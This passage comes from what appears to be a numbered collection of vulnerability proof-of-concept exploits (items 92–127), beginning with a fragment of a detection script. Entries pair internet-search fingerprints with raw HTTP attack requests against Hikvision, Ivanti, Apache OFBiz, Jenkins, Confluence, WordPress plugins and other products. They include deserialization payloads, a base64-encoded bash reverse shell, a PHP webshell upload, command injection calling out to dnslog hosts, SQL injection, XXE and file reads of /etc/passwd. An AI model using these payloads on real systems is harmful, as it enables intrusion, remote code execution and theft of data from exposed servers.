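        print(idx, SAMPLE_RECORDS[idx]["line"][:60], hits)
```

The shell_metachar rule is deliberately narrow (a pipe, backtick or newline immediately after =) to keep noise down on ordinary traffic; widen it only after checking what your own applications legitimately send.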
92. 海康威视 (Hikvision) 运行管理中心 session command execution
Fastjson deserialization; the command to run is taken from the Testcmd header.
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate3600 防火墙 app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
The upfile part is stored under /attachements/ with its original name; no authentication is required.
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen (奇安信网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (北京百绰智能) S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (北京百绰智能) S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default username/password is admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (北京百绰智能) S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the base64-encoded SQL statement: sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The output of the executed command (id) is returned in the X-Cmd-Response response header.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The file is written under the web root and served at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Note: browsers and most proxies collapse the ../ segments before the request leaves the client, so send it with a raw client (a repeater, or curl --path-as-is).

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
